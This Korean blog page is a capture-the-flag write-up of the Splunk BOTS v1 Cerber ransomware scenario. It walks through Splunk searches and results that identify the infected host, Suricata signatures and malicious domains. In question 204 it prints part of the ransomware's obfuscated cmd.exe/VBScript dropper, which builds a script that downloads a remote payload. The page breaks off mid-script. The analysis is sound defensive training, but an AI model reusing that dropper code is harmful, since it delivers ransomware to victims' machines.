<!DOCTYPE html>
<html>
<head>

    <!-- Document Settings -->
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />

    <!-- Base Meta -->
    <!-- dynamically fixing the title for tag/author pages -->



    <title>splunk-bots-v1 write up - part2</title>
    <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <!-- Styles'n'Scripts -->
    <link rel="stylesheet" type="text/css" href="/assets/built/screen.css" />
    <link rel="stylesheet" type="text/css" href="/assets/built/screen.edited.css" />
    <link rel="stylesheet" type="text/css" href="/assets/built/syntax.css" />

    <!-- custom.css -->
    <link rel="stylesheet" type="text/css" href="/assets/built/custom.css" />

    <!-- 웹 폰트 설정 -->
    <link rel="stylesheet" href="https://fonts.googleapis.com/earlyaccess/nanumgothic.css">

    <!-- awesome icon -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">

    <!-- syntax.css -->
    <link rel="stylesheet" href="/assets/built/syntax.css">

    <!-- highlight.js -->
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/default.min.css">
    <style>.hljs { background: none; }</style>

    <!--[if IE]>
        <style>
            p, ol, ul{
                width: 100%;
            }
            blockquote{
                width: 100%;
            }
        </style>
    <![endif]-->
    
    <!-- This tag outputs SEO meta+structured data and other important settings -->
    <meta name="description" content="wind-flow Tech Blog" />
    <link rel="shortcut icon" href="https://wind-flow.github.io/assets/built/images/wind-flow.png" type="image/png" />
    <link rel="canonical" href="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2" />
    <meta name="referrer" content="no-referrer-when-downgrade" />

     <!--title below is coming from _includes/dynamic_title-->
    <meta property="og:site_name" content="wind-flow Tech Blog" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="splunk-bots-v1 write up - part2" />
    <meta property="og:description" content="## Splunk SOC 대회인 BOSS OF THE SOC(BOTS) Write up {% include bots-table-of-contents.html %} 시나리오는 아래와 같습니다. Scenario 1 (APT): The focus of this hands on lab will be an APT scenario and a ransomware scenario. You assume the persona of Alice Bluebird, the analyst who has recently been hired" />
    <meta property="og:url" content="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2" />
    <meta property="og:image" content="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/bots-v1.jpg" />
    <meta property="article:publisher" content="https://www.facebook.com/" />
    <meta property="article:author" content="https://www.facebook.com/" />
    <meta property="article:published_time" content="2021-10-03T23:34:36+09:00" />
    <meta property="article:modified_time" content="2021-10-03T23:34:36+09:00" />
    <meta property="article:tag" content="Splunk" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="splunk-bots-v1 write up - part2" />
    <meta name="twitter:description" content="## Splunk SOC 대회인 BOSS OF THE SOC(BOTS) Write up {% include bots-table-of-contents.html %} 시나리오는 아래와 같습니다. Scenario 1 (APT): The focus of this hands on lab will be an APT scenario and a ransomware scenario. You assume the persona of Alice Bluebird, the analyst who has recently been hired" />
    <meta name="twitter:url" content="https://wind-flow.github.io/" />
    <meta name="twitter:image" content="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/bots-v1.jpg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="wind-flow Tech Blog" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Splunk" />
    <meta name="twitter:site" content="@" />
    <meta name="twitter:creator" content="@" />
    <meta property="og:image:width" content="1400" />
    <meta property="og:image:height" content="933" />

    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Website",
    "publisher": {
        "@type": "Organization",
        "name": "wind-flow Tech Blog",
        "logo": "https://wind-flow.github.io/"
    },
    "url": "https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2",
    "image": {
        "@type": "ImageObject",
        "url": "https://wind-flow.github.io/assets/built/images/splunk/bots/v1/bots-v1.jpg",
        "width": 2000,
        "height": 666
    },
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2"
    },
    "description": "## Splunk SOC 대회인 BOSS OF THE SOC(BOTS) Write up {% include bots-table-of-contents.html %} 시나리오는 아래와 같습니다. Scenario 1 (APT): The focus of this hands on lab will be an APT scenario and a ransomware scenario. You assume the persona of Alice Bluebird, the analyst who has recently been hired"
}
    </script>

    <!-- <script type="text/javascript" src="https://demo.ghost.io/public/ghost-sdk.min.js?v=724281a32e"></script>
    <script type="text/javascript">
    ghost.init({
    	clientId: "ghost-frontend",
    	clientSecret: "f84a07a72b17"
    });
    </script> -->

    <meta name="generator" content="Jekyll 3.6.2" />
    <link rel="alternate" type="application/rss+xml" title="splunk-bots-v1 write up - part2" href="/feed.xml" />


</head>
<body class="post-template">

    <div class="site-wrapper">
        <!-- All the main content gets inserted here, index.hbs, post.hbs, etc -->
        <!-- default -->

<!-- The tag above means: insert everything in this file
into the {body} of the default.hbs template -->

<header class="site-header outer">
    <div class="inner">
        <nav class="site-nav">
    <div class="site-nav-left">
        
            
                <a class="site-nav-logo" href="https://wind-flow.github.io/">wind-flow Tech Blog</a>
            
        
        
            <ul class="nav" role="menu">
  <li class="nav-home" role="menuitem"><a href="/">Home</a></li>
  <li class="nav-about" role="menuitem">
    <a href="/about/">About</a>
  </li>
  <li class="nav-splunk" role="menuitem">
    <a href="/tag/splunk/">splunk</a>
  </li>
  <!-- <li class="nav-python" role="menuitem"><a href="/tag/python/">Python</a></li> -->
  <li class="nav-archive" role="menuitem">
    <a href="/archive.html">All Posts</a>
  </li>
  <li class="nav-archive" role="menuitem">
    <a href="/author_archive.html">Tag별 Posts</a>
  </li>
</ul>

        
    </div>
    <div class="site-nav-right">
        <div class="social-links">
            
            
        </div>
        
            <a class="subscribe-button" href="#subscribe">search</a>
        
    </div>
</nav>

    </div>
</header>

<!-- Everything inside the #post tags pulls data from the post -->
<!-- #post -->

<main id="site-main" class="site-main outer" role="main">
    <div class="inner">

        <article class="post-full  tag-splunk post tag-splunk ">

            <header class="post-full-header">
                <section class="post-full-meta">
                    <time class="post-full-meta-date" datetime=" 3 October 2021"> 3 October 2021</time>
                    
                        <span class="date-divider">/</span>
                        
                            
                               <a href='/tag/splunk/'>SPLUNK</a>
                            
                        
                    
                </section>
                <h1 class="post-full-title">splunk-bots-v1 write up - part2</h1>
            </header>

            <!-- 
            <figure class="post-full-image" style="background-image: url(/assets/built/images/splunk/bots/v1/bots-v1.jpg)">
            </figure>
             -->

            <section class="post-full-content">
                <div class="kg-card-markdown">
                    <h2 id="splunk-soc-대회인-boss-of-the-socbots-write-up">Splunk SOC 대회인 BOSS OF THE SOC(BOTS) Write up</h2>

<script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6619794523475927" crossorigin="anonymous"></script>

<p><span class="table-of-contents-list">Splunk BOTS의 데이터셋은 3개입니다.</span></p>
<ul class="table-of-contents-list">
  <li><a href="./splunk-BOTS-overview">BOTS란? </a></li>
  <li><a href="./splunk-BOTS-v1-part1">BOTS v1 Write up(1)</a></li>
  <li><a href="./splunk-BOTS-v1-part2">BOTS v1 Write up(2) - END</a></li>
  <li><a href="./splunk-BOTS-v2-part1">BOTS v2 Write up(1) </a></li>
  <li><a href="./splunk-BOTS-v2-part2">BOTS v2 Write up(2) </a></li>
  <li><a href="./splunk-BOTS-v2-part3">BOTS v2 Write up(3) </a></li>
  <li><a href="./splunk-BOTS-v2-part4">BOTS v2 Write up(4) </a></li>
  <li><a href="./splunk-BOTS-v2-part5">BOTS v2 Write up(5) - END</a></li>
  <li><a href="./splunk-BOTS-v3-part1">BOTS v3 Write up(1)</a></li>
  <li><a href="./splunk-BOTS-v3-part2">BOTS v3 Write up(2)</a></li>
  <li><a href="./splunk-BOTS-v3-part3">BOTS v3 Write up(3)</a></li>
  <li><a href="./splunk-BOTS-v3-part4">BOTS v3 Write up(4) - END</a></li>
  <li><a href="./splunk-2021-BOTS-END">BOTS v4 결과</a></li>
</ul>

<p>시나리오는 아래와 같습니다.</p>

<p>Scenario 1 (APT):
The focus of this hands on lab will be an APT scenario and a ransomware scenario. You assume the persona of Alice Bluebird, the analyst who has recently been hired to protect and defend Wayne Enterprises against various forms of cyberattack.
In this scenario, reports of the below graphic come in from your user community when they visit the Wayne Enterprises website, and some of the reports reference “P01s0n1vy.” In case you are unaware, P01s0n1vy is an APT group that has targeted Wayne Enterprises. Your goal, as Alice, is to investigate the defacement, with an eye towards reconstructing the attack via the Lockheed Martin Kill Chain.</p>

<p>- 시나리오#1 요약<br />
해킹그룹 <code class="language-plaintext highlighter-rouge">P01s0n1vy</code>가 <code class="language-plaintext highlighter-rouge">Wayne</code>기업를 해킹했습니다. 당신은 보안 담당자, Alice Bluebird의 입장에서 <code class="language-plaintext highlighter-rouge">Lockheed Martin의 Cyberkillchain</code> 모델을 이용해 침해 사고를 분석해야 합니다.</p>

<p><img src="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/Defacement.png" alt="Scenario 1" /></p>

<p><img src="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/cyberkillchain.jpg" alt="록히드마틴 사이버킬체인 7단계" /><br />
[록히드마틴 사이버킬체인 7단계]</p>

<p>Scenario 2 (Ransomeware):
In the second scenario, one of your users is greeted by this image on a Windows desktop that is claiming that files on the system have been encrypted and payment must be made to get the files back. It appears that a machine has been infected with Cerber ransomware at Wayne Enterprises and your goal is to investigate the ransomware with an eye towards reconstructing the attack.</p>

<p>- 시나리오#2 요약<br />
<code class="language-plaintext highlighter-rouge">Wayne</code>기업 직원 중 한 명이 시스템의 파일이 암호화 되었으며 파일을 복호화하려면 비용을 지불해야 하는 내용의 이미지를 보게 됩니다. 시스템이 <code class="language-plaintext highlighter-rouge">Wayne</code>의 <code class="language-plaintext highlighter-rouge">Cerber 랜섬웨어</code>에 감염된 것으로 보이며 귀하의 목표는 재공격을 염두에 두고 랜섬웨어를 조사하는 것입니다.</p>

<p><img src="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/ransomewere.png" alt="Scenario 2" /></p>

<p>200	What was the most likely IP address of we8105desk on 24AUG2016?<br />
2016년 8월 24일 we8105desk의 가장 가능성이 높아 보이는 IP 주소는 무엇입니까?</p>
<details>
  <summary>hint#1</summary>
  Keep it simple and just search for the hostname provided in the question.  Try using the stats command to get a count of events by source ip address to point you in the right direction.<br />
  
  간단하게 유지하고 질문에 제공된 호스트 이름을 검색하십시오. stats 명령을 사용하여 소스 IP 주소별로 이벤트 수를 가져와 올바른 방향으로 조사해 보세요.
</details>

<p>hostname이 we8105desk 키워드로 어떤 sourcetype에 가장 많이 있을지 조사해봅니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>we8105desk 
| stats count by sourcetype
</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>sourcetype</th>
      <th>count</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>XmlWinEventLog:Microsoft-Windows-Sysmon/Operational</td>
      <td>130354</td>
    </tr>
    <tr>
      <td>wineventlog</td>
      <td>49006</td>
    </tr>
    <tr>
      <td>stream:smb</td>
      <td>1529</td>
    </tr>
    <tr>
      <td>stream:ldap</td>
      <td>74</td>
    </tr>
    <tr>
      <td>nessus:scan</td>
      <td>24</td>
    </tr>
    <tr>
      <td>stream:dns</td>
      <td>20</td>
    </tr>
    <tr>
      <td>WinRegistry</td>
      <td>3</td>
    </tr>
    <tr>
      <td>suricata</td>
      <td>2</td>
    </tr>
  </tbody>
</table>

<p>여러 sourcetype에서 해당 호스트의 IP가 있을것이지만, 그중 원격 접속인 smb sourcetype에 IP관련 필드에서 찾아봅니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>we8105desk   sourcetype="stream:smb"
</code></pre></div></div>

<p>IP를 파악하기위해 smb에 눈여겨볼만한 field는 src_ip, dest_ip, path를 확인해보면 됩니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>we8105desk sourcetype="stream:smb"
| dedup src_ip dest_ip path
| table src_ip dest_ip path
</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>src_ip</th>
      <th>dest_ip</th>
      <th>path</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\IPC$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\C$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\c$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\ROOT</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\D$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\WINNT$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\ADMIN$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\LOGS$</td>
    </tr>
    <tr>
      <td>192.168.2.50</td>
      <td>192.168.250.100</td>
      <td>\WE8105DESK\ARCSERVE$</td>
    </tr>
    <tr>
      <td>192.168.250.100</td>
      <td>192.168.2.50</td>
      <td>\WE8105DESK\IPC$</td>
    </tr>
  </tbody>
</table>

<p>path의 host가 모두 WE8105DESK니, 해당 PC의 IP는 192.168.250.100일 가능성이 제일 높습니다.</p>

<p>답 : 192.168.250.100</p>

<p>201	Amongst the Suricata signatures that detected the Cerber malware, which one alerted the fewest number of times? Submit ONLY the signature ID value as the answer. (No punctuation, just 7 integers.)<br />
Cerber 악성코드를 탐지한 Suricata 시그니처 중 가장 적게 경고한 것은? 서명 ID 값만 답변으로 제출하십시오. (문장부호는 없고 7개의 정수만 있습니다.)</p>

<details>
  <summary>hint#1</summary>
  Keep it simple and start your search by looking at only the sourcetype associated with Suricata and maybe even the name of the malware in question.  The field containing the signature ID should be obvious.  Use stats to create a count by the field containing the signature ID.<br />

  단순하게 유지하고 Suricata와 연결된 소스 유형만 보고 심지어 문제의 맬웨어 이름까지 살펴봄으로써 검색을 시작하십시오. 서명 ID가 포함된 필드는 명확해야 합니다. 통계를 사용하여 서명 ID가 포함된 필드로 개수를 만듭니다.
</details>

<p>suricata에서 cerber(케르베르스) 관련 이벤트가 있는지 검색해봅시다.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype=suricata *cerber*
</code></pre></div></div>

<p>alert.signature_id라는 필드가 눈에 띕니다
<img src="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-15-16-55-44.png" alt="alert.signature_id" /></p>

<p>가장 적은 signature id는 2816763 입니다.</p>

<p>답 : 2816763</p>

<p>202	What fully qualified domain name (FQDN) does the Cerber ransomware attempt to direct the user to at the end of its encryption phase?<br />
Cerber 랜섬웨어는 암호화 단계가 끝나면 어떤 FQDN(정규화된 도메인 이름)을 사용자에게 지시합니까?</p>

<details>
  <summary>hint#1</summary>
  Search stream:dns data for A queries coming from the infected workstation IP on the date in question.  Try and narrow your search period.<br />
  해당 날짜에 감염된 워크스테이션 IP에서 오는 A 쿼리에 대한 검색 stream:dns에서 찾으십시오. 검색 기간을 좁혀 보십시오.
</details>

<details>
  <summary>hint#2</summary>
  Perform a shannon entropy analysis on the query{} field using URL toolbox by adding this to the end of the search: |`ut_shannon(query{})` | stats count by ut_shannon, query{} | sort -ut_shannon<br />
  
  다음을 검색 끝에 추가하여 URL 도구 상자를 사용하여 쿼리 필드에서 shannon 엔트로피 분석을 수행합니다. |`ut_shannon(query{})` | stats count by ut_shannon, query{} | sort -ut_shannon
</details>

<p>8/24일에 WE8105DESK(192.168.250.100)가 cerber 랜섬웨어에 걸렸으므로, 이 호스트가 DNS서버에 질의했을것 입니다.</p>

<p>url 질의 DNS 쿼리 타입은 A타입 입니다.</p>
<ul>
  <li><a href="https://ko.wikipedia.org/wiki/DNS_%EB%A0%88%EC%BD%94%EB%93%9C_%ED%83%80%EC%9E%85_%EB%AA%A9%EB%A1%9D">DNS 쿼리 타입</a></li>
</ul>

<p>(검색 기간8/24일로 설정)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype=stream:DNS src=192.168.250.100 record_type=A
| dedup query
| table query
</code></pre></div></div>

<ul>
  <li>결과</li>
</ul>

<table>
  <thead>
    <tr>
      <th>query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>crl.microsoft.com<br />crl.microsoft.com</td>
    </tr>
    <tr>
      <td>wpad<br />wpad</td>
    </tr>
    <tr>
      <td>we9041srv.waynecorpinc.local<br />we9041srv.waynecorpinc.local</td>
    </tr>
    <tr>
      <td>isatap<br />isatap</td>
    </tr>
    <tr>
      <td>isatap.waynecorpinc.local<br />isatap.waynecorpinc.local</td>
    </tr>
    <tr>
      <td>www.microsoft.com<br />www.microsoft.com</td>
    </tr>
    <tr>
      <td>wpad.waynecorpinc.local<br />wpad.waynecorpinc.local</td>
    </tr>
    <tr>
      <td>cerberhhyed5frqa.xmfir0.win<br />cerberhhyed5frqa.xmfir0.win</td>
    </tr>
    <tr>
      <td>www.bing.com<br />www.bing.com</td>
    </tr>
    <tr>
      <td>go.microsoft.com<br />go.microsoft.com</td>
    </tr>
    <tr>
      <td>shell.windows.com<br />shell.windows.com</td>
    </tr>
    <tr>
      <td>activation.sls.microsoft.com<br />activation.sls.microsoft.com</td>
    </tr>
    <tr>
      <td>ipinfo.io<br />ipinfo.io</td>
    </tr>
    <tr>
      <td>solidaritedeproximite.org<br />solidaritedeproximite.org</td>
    </tr>
    <tr>
      <td>dns.msftncsi.com<br />dns.msftncsi.com</td>
    </tr>
  </tbody>
</table>

<p>위 검색결과 중 cerber키워드가 들어간 cerberhhyed5frqa.xmfir0.win가 답입니다.</p>

<p>답 : cerberhhyed5frqa.xmfir0.win</p>

<p>203	What was the first suspicious domain visited by we8105desk on 24AUG2016?<br />
2016년 8월 24일 we8105desk가 처음으로 방문한 의심스러운 도메인은 무엇입니까?</p>

<details>
  <summary>hint#1</summary>
  Search stream:dns data for A queries coming from the infected workstation IP on the date in question.<br />
  query Type이 A인 stream:dns를 조사하여 해당 날짜에 감염된 워크스테이션 IP를 분석해보세요.
</details>
<details>
  <summary>hint#2</summary>
  Use the "| reverse" SPL command to show oldest events first.<br />
  "| reverse" SPL 명령을 사용하여 가장 오래된 이벤트를 먼저 표시합니다.
</details>
<details>
  <summary>hint#3</summary>
  Eliminate domain lookups that you can explain, question the first one you cannot.<br />
  설명할 수 있는 도메인 조회를 제거하고 첫 번째 질문에 질문하십시오.
</details>
<details>
  <summary>hint#4</summary>
  Go and git some IOCs on Cerber.  Then compare to the DNS Data<br />
  Cerber에 가서 IOC를 가져오세요. 그런 다음 DNS 데이터와 비교하십시오.
</details>

<p>we8105desk src ip(192.168.250.100)를 조건을 추가한 stream:http sourcetype에 url관련 정보가 있을 것입니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>src=192.168.250.100 sourcetype="stream:http"
| sort _time
| dedup _time url
| table _time url
</code></pre></div></div>

<ul>
  <li>결과</li>
</ul>

<table>
  <thead>
    <tr>
      <th>_time</th>
      <th>url</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2016/08/24 16:34:27.004</td>
      <td>http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:34:31.660</td>
      <td>http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:34:36.317</td>
      <td>http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:34:40.943</td>
      <td>http://crl.microsoft.com/pki/crl/products/CodeSignPCA2.crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:34:45.589</td>
      <td>http://crl.microsoft.com/pki/crl/products/WinPCA.crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:34:50.301</td>
      <td>http://www.microsoft.com/pki/CRL/products/Microsoft%20Windows%20Hardware%20Compatibility%20PCA(1).crl</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:13.285</td>
      <td>http://solidaritedeproximite.org/mhtr.jpg</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:14.620</td>
      <td>http://92.222.104.182/mhtr.jpg</td>
    </tr>
    <tr>
      <td>2016/08/24 16:49:24.504</td>
      <td>http://ipinfo.io/json</td>
    </tr>
    <tr>
      <td>2016/08/24 16:53:21.344</td>
      <td>http://go.microsoft.com/fwlink/</td>
    </tr>
    <tr>
      <td>2016/08/24 16:53:26.936</td>
      <td>http://go.microsoft.com/fwlink/</td>
    </tr>
  </tbody>
</table>

<p>URL중 microsoft, ipinfo는 유명한 URL이지만 solidaritedeproximite.org는 알려지지 않은 URL이므로 의심 할 수 있습니다.</p>

<p>답 : solidaritedeproximite.org</p>

<p>204	During the initial Cerber infection a VB script is run. The entire script from this execution, pre-pended by the name of the launching .exe, can be found in a field in Splunk. What is the length in characters of the value of this field?<br />
초기 Cerber 감염 동안 VB 스크립트가 실행됩니다. 시작하는 .exe의 이름이 앞에 추가된 이 실행의 전체 스크립트는 Splunk의 필드에서 찾을 수 있습니다. 이 필드 값의 문자 길이는 얼마입니까?</p>
<details>
  <summary>hint#1</summary>
  Keep it simple.  Start by looking at sysmon data for the infected device on the date in question.  Calculate the length of the command line using the "len()" function of the "eval" SPL command, and give your eyes a break by using the splunk table command. <br />
  간단하게 생각하세요. 해당 날짜에 감염된 장치에 대한 sysmon 데이터를 확인하여 시작합니다. "eval" SPL 명령의 "len()" 함수를 사용하여 명령줄의 길이를 계산하고 splunk table 명령을 사용하여 시각화 합니다.
</details>

<p>command관련 데이터는 sysmon에 있을것입니다. 아래 조건을 추가해 검색해 봅니다.</p>
<ol>
  <li>.exe와 vbs(VB 스크립트)를 추가</li>
  <li>스크립트 실행이므로 EventCode=1(Process Creation)</li>
  <li>감염된 host인 we8105desk에서 검색</li>
  <li>ParentCommandLine과 CommandLine의 길이를 계산</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational .exe *vbs*
host=we8105desk EventCode=1
| eval lenPcl=len(ParentCommandLine) 
| eval lenCl=len(CommandLine)
| table lenCl CommandLine lenPcl ParentCommandLine
</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>lenCl</th>
      <th>CommandLine</th>
      <th>lenPcl</th>
      <th>ParentCommandLine</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\AE501557-78F9-4459-8FCF-315C305567CC.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\8258BF6F-9A60-4ACD-87CE-C5C347639FA6.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\D63D009F-2486-4872-8ED8-898159C8A33B.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\5F336C48-BD3F-46AF-8FB1-E076BA7329CB.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\A1985133-B0BB-4771-9B34-54C1DC493370.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>76</td>
      <td>cscript.exe /nologo C:\Windows\TEMP\E5548D7D-7D5D-4693-A892-94129A925C26.vbs</td>
      <td>73</td>
      <td>“C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe”</td>
    </tr>
    <tr>
      <td>4490</td>
      <td>cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” &amp;&amp; (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()” “J0Nepq=56” “Dim UJv,G4coQ” “LT=23” “dO WHiLE UJv&lt;&gt;3016-3015” “G4coQ=G4coQ+1” “WSCRiPt.sLEeP(11)” “LoOP” “UsZK0=85” “ENd suB” “fuNctIon J7(BLI4A3)” “K5AU=29” “J7=cHR(BLI4A3)” “XBNutM9=36” “eNd fuNCtiON” “SUb MA(QrG)” “WXCzRz=9” “Dim Jw” “Qt7=34” “Jw=TIMeR+QrG” “Do WhiLE tIMEr&lt;Jw” “WSCRipT.sleEP(6)” “LOOp” “EXdkRkH=78” “enD sUB” “fUnCTion M1p67jL(BwqIM7,Qa)” “Yi=80” “dIM KH,ChnFY,RX,Pg,C6YT(8)” “Cm=7” “C6YT(1)=107” “Rzf=58” “C6YT(5)=115” “BSKoW=10” “C6YT(4)=56” “Cwd6=35” “C6YT(7)=110” “AQ=98” “C6YT(6)=100” “Y6Cm1I=82” “C6YT(2)=103” “JH3F2i=74” “C6YT(8)=119” “JRvsG2s=76” “C6YT(3)=53” “Yh=31” “C6YT(0)=115” “GuvD=47” “Tbvf1=67” “SeT KH=cReATeObject(A9y(“3C3A1D301F2D063708772930033C3C201C2D0A34203B053C0C2D”, “Yo”))” “V2JR=73” “Set ChnFY=KH.GETfilE(BwqIM7)” “RGeJ=68” “SeT Pg=ChnFY.opEnASTExTstReAM(6806-6805,7273-7273)” “CtxOk=82” “seT RX=KH.cREateteXtFiLe(Qa,6566-6565,2508-2508)” “XPL9af=76” “Do uNtil Pg.aTEnDOfStReam” “RX.wRitE J7(OyVNo(GNbiPp(Pg.rEAD(6633-6632)),C6YT(0)))” “LooP” “IQz=49” “RX.cloSe” “CBR1gC7=51” “Pg.cLOSE” “PmG=64” “eNd funCTIOn” “FUNcTION Ql9zEF()” “IBL2=16” “Ql9zEF=secoND(Time)” “MUTkPNJ=41” “End FUNcTiOn” “FUnCtion A9y(Am,T1GCbB)” “CWCH9r=82” “Dim V3sl0m,F4ra,AxFE” “RLLp8R=89” “For V3sl0m=1 To (lEn(Am)/2)” “F4ra=(J7((8270-8232)) &amp; J7((5328/74))&amp;(miD(Am,(V3sl0m+V3sl0m)-1,2)))” “AxFE=(GNbiPp(mID(T1GCbB,((V3sl0m MOd Len(T1GCbB))+1),1)))” “A9y=A9y+J7(OyVNo(F4ra,AxFE))” “NeXT” “DxZ40=89” “enD fUNction” “Sub AylniN()” “N6nzb=92” “DIm GWJCk,Q3y,GKasG0” “FDu=47” “GWJCk=93961822” “UZ=32” “FoR Q3y=1 To GWJCk” “GKasG0=GKasG0+1” “neXt” “B1jq2Hk=63” “If GKasG0=GWJCk tHen” “KXso=18” “MA((-176+446))” “IP4=48” “Yq(A9y(“0B3B1D44626E7E1020055D3C20230A3B0C503D31230C3700593135344D201B53772C39173D475E2826”,”QcOi4XA”))” “YTsWy=31” “elSe” “DO5gpmA=84” “A8=86” “EnD iF” “XyUP=64” “eND SuB” “sUB GKfD3aY(FaddNPJ)” “SDU0BLq=57” “DiM UPhqZ,KbcT” “DxejPK=88” “KbcT=”Drn4AW”” “GROlc7=82” “sET UPhqZ=CREAteOBJecT(A9y(“332A7B05156A211A46243629”,KbcT))” “Gs0g=3” “UPhqZ.OpEn” “TF1=68” “UPhqZ.tyPE=6867-6866” “RDjmY=24” “UPhqZ.wrITe FaddNPJ” “WiFgvS=78” “UPhqZ.SaVeTOfIle RWRL,8725-8723” “AF=4” “UPhqZ.closE” “JC7sf2=1” “Cke4e” “JM=88” “EnD suB” “fuNCtIoN Yq(PDqi1)” “I0=22” “DiM YTwwO,BAU7Cz,Uv,JiYwVG,IK” “GJDnbE=32” “On ErrOR reSume NeXT” “B7bT=1” “Uv=”Tk”” “ELw=73” “sEt YTwwO=CREaTeObjeCT(A9y(“3C07082602241F7A383C0E3807”,Uv))” “K4=62” “GAiF” “IS1cj=19” “Set Dzc0=YTwwO.eNVIrONMEnt(A9y(“013B183400023A”,”EQiWw”))” “D9S=38” “RWRL=Dzc0(A9y(“14630811720C14”,”XU3”))&amp;J7((8002-7910))&amp; Ql9zEF &amp; Ql9zEF” “AtCQ=95” “JiYwVG=”FcQqQ”” “Tf=79” “sEt BAU7Cz=CrEATEoBjECT(A9y(“2E38122329103E1725683B1C3D19123701”,JiYwVG))” “QUY=56” “BAU7Cz.OpeN A9y(“0D0E1E”,”KJ”),PDqi1,7387-7387” “JX2=58” “BAU7Cz.SeTReQuEstHeAdeR A9y(“1F59242828”,”OM8J”),A9y(“0D354C3D356B567A0F6B6B”,”VoL8XF”)” “URkT=71” “BAU7Cz.SEnD()” “QdFeA6=65” “if 